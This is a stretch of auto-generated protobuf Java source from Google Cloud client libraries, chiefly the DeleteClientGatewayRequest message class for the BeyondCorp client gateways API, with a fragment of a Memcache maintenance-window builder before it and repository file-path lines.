com.google.protobuf.Duration.getDefaultInstance()) { getDurationBuilder().mergeFrom(value); } else { duration_ = value; } } else { durationBuilder_.mergeFrom(value); } if (duration_ != null) { bitField0_ |= 0x00000004; onChanged(); } return this; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearDuration() { bitField0_ = (bitField0_ & ~0x00000004); duration_ = null; if (durationBuilder_ != null) { durationBuilder_.dispose(); durationBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.Duration.Builder getDurationBuilder() { bitField0_ |= 0x00000004; onChanged(); return getDurationFieldBuilder().getBuilder(); } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.protobuf.DurationOrBuilder getDurationOrBuilder() { if (durationBuilder_ != null) { return durationBuilder_.getMessageOrBuilder(); } else { return duration_ == null ? com.google.protobuf.Duration.getDefaultInstance() : duration_; } } /** * * * <pre> * Required. Duration of the time window. * </pre> * * <code>.google.protobuf.Duration duration = 3 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> getDurationFieldBuilder() { if (durationBuilder_ == null) { durationBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder>( getDuration(), getParentForChildren(), isClean()); duration_ = null; } return durationBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.memcache.v1.WeeklyMaintenanceWindow) } // @@protoc_insertion_point(class_scope:google.cloud.memcache.v1.WeeklyMaintenanceWindow) private static final com.google.cloud.memcache.v1.WeeklyMaintenanceWindow DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.memcache.v1.WeeklyMaintenanceWindow(); } public static com.google.cloud.memcache.v1.WeeklyMaintenanceWindow getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<WeeklyMaintenanceWindow> PARSER = new com.google.protobuf.AbstractParser<WeeklyMaintenanceWindow>() { @java.lang.Override public WeeklyMaintenanceWindow parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<WeeklyMaintenanceWindow> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<WeeklyMaintenanceWindow> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.memcache.v1.WeeklyMaintenanceWindow getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,867
java-beyondcorp-clientgateways/proto-google-cloud-beyondcorp-clientgateways-v1/src/main/java/com/google/cloud/beyondcorp/clientgateways/v1/DeleteClientGatewayRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/beyondcorp/clientgateways/v1/client_gateways_service.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.beyondcorp.clientgateways.v1; /** * * * <pre> * Message for deleting a ClientGateway * </pre> * * Protobuf type {@code google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest} */ public final class DeleteClientGatewayRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) DeleteClientGatewayRequestOrBuilder { private static final long serialVersionUID = 0L; // Use DeleteClientGatewayRequest.newBuilder() to construct. private DeleteClientGatewayRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private DeleteClientGatewayRequest() { name_ = ""; requestId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new DeleteClientGatewayRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.class, com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.Builder.class); } public static final int NAME_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ @java.lang.Override public java.lang.String getName() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ @java.lang.Override public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int REQUEST_ID_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The requestId. */ @java.lang.Override public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for requestId. */ @java.lang.Override public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. * </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, requestId_); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(name_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, name_); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(requestId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, requestId_); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream.computeBoolSize(3, validateOnly_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest)) { return super.equals(obj); } com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest other = (com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) obj; if (!getName().equals(other.getName())) return false; if (!getRequestId().equals(other.getRequestId())) return false; if (getValidateOnly() != other.getValidateOnly()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + NAME_FIELD_NUMBER; hash = (53 * hash) + getName().hashCode(); hash = (37 * hash) + REQUEST_ID_FIELD_NUMBER; hash = (53 * hash) + getRequestId().hashCode(); hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(getValidateOnly()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for deleting a ClientGateway * </pre> * * Protobuf type {@code google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.class, com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.Builder .class); } // Construct using // com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; name_ = ""; requestId_ = ""; validateOnly_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.beyondcorp.clientgateways.v1.ClientGatewaysServiceProto .internal_static_google_cloud_beyondcorp_clientgateways_v1_DeleteClientGatewayRequest_descriptor; } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest getDefaultInstanceForType() { return com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest .getDefaultInstance(); } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest build() { com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest buildPartial() { com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest result = new com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.name_ = name_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.requestId_ = requestId_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) { return mergeFrom( (com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest other) { if (other == com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest .getDefaultInstance()) return this; if (!other.getName().isEmpty()) { name_ = other.name_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getRequestId().isEmpty()) { requestId_ = other.requestId_; bitField0_ |= 0x00000002; onChanged(); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { name_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { requestId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ public java.lang.String getName() { java.lang.Object ref = name_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The name to set. * @return This builder for chaining. */ public Builder setName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearName() { name_ = getDefaultInstance().getName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for name to set. * @return This builder for chaining. */ public Builder setNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The requestId. */ public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The bytes for requestId. */ public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The requestId to set. * @return This builder for chaining. */ public Builder setRequestId(java.lang.String value) { if (value == null) { throw new NullPointerException(); } requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearRequestId() { requestId_ = getDefaultInstance().getRequestId(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and t * he request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code>string request_id = 2 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The bytes for requestId to set. * @return This builder for chaining. */ public Builder setRequestIdBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private boolean validateOnly_; /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. * </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. * </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Optional. If set, validates request by executing a dry-run which would not * alter the resource in any way. * </pre> * * <code>bool validate_only = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) } // @@protoc_insertion_point(class_scope:google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest) private static final com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest(); } public static com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<DeleteClientGatewayRequest> PARSER = new com.google.protobuf.AbstractParser<DeleteClientGatewayRequest>() { @java.lang.Override public DeleteClientGatewayRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<DeleteClientGatewayRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<DeleteClientGatewayRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.beyondcorp.clientgateways.v1.DeleteClientGatewayRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,696
java-network-management/proto-google-cloud-network-management-v1beta1/src/main/java/com/google/cloud/networkmanagement/v1beta1/CloudRunRevisionInfo.java
